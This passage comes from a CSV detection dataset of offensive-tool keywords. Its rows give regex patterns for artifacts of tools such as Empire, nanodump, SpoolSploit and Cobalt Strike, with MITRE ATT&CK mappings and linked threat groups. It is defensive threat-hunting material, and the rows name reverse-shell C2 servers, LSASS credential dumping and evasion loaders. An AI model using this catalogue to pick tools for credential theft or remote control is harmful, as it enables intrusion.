- T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59981" "*spoof_wani*",".{0,1000}spoof_wani.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","59982" "*spoof_wlan_creds*",".{0,1000}spoof_wlan_creds.{0,1000}","offensive_tool_keyword","C2_Server","C2 
server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","59983" "*--spoof-callstack *",".{0,1000}\-\-spoof\-callstack\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","59984" "*SpooferHostsIgnore*",".{0,1000}SpooferHostsIgnore.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59985" "*SpooferHostsReply*",".{0,1000}SpooferHostsReply.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59986" "*SpooferIP*",".{0,1000}SpooferIP.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59987" "*SpooferIPsIgnore*",".{0,1000}SpooferIPsIgnore.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59988" "*SpooferIPsReply*",".{0,1000}SpooferIPsReply.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59989" "*SpooferLearningDelay*",".{0,1000}SpooferLearningDelay.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59990" "*SpooferLearningInterval*",".{0,1000}SpooferLearningInterval.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59991" "*SpooferRepeat*",".{0,1000}SpooferRepeat.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59992" "*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*",".{0,1000}SPOOFING\sGROUP\sPOLICY\sTEMPLATE\sLOCATION\sTHROUGH\sgPCFileSysPath.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","59993" "*Spoofy/spoofy.py*",".{0,1000}Spoofy\/spoofy\.py.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team 
assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","59994" "*SpookFlare*",".{0,1000}SpookFlare.{0,1000}","offensive_tool_keyword","SpookFlare","SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader/dropper generator for Meterpreter. Empire. Koadic etc. SpookFlare has obfuscation. encoding. run-time code compilation and character substitution features.","T1027 - T1029 - T1218 - T1112","TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hlldz/SpookFlare","1","0","N/A","N/A","N/A","10","950","188","2019-05-08T09:03:45Z","2017-11-13T17:22:12Z","59995" "*spookflare.py*",".{0,1000}spookflare\.py.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","59996" "*spool_sploit.py*",".{0,1000}spool_sploit\.py.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","59997" "*spooler_check*",".{0,1000}spooler_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - 
T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","59998" "*SpoolSample.exe * *",".{0,1000}SpoolSample\.exe\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","59999" "*SpoolSample_v4.5_x64.exe*",".{0,1000}SpoolSample_v4\.5_x64\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60000" "*SpoolSploit/*",".{0,1000}SpoolSploit\/.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","60001" "*spoolsploit:latest*",".{0,1000}spoolsploit\:latest.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - 
T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","60002" "*spoolss_##*",".{0,1000}spoolss_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","60003" "*spoolsystem inject*",".{0,1000}spoolsystem\sinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60004" "*spoolsystem spawn*",".{0,1000}spoolsystem\sspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60005" "*spoolsystem.cna*",".{0,1000}spoolsystem\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60006" "*SpoolTrigger.x64.dl*",".{0,1000}SpoolTrigger\.x64\.dl.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 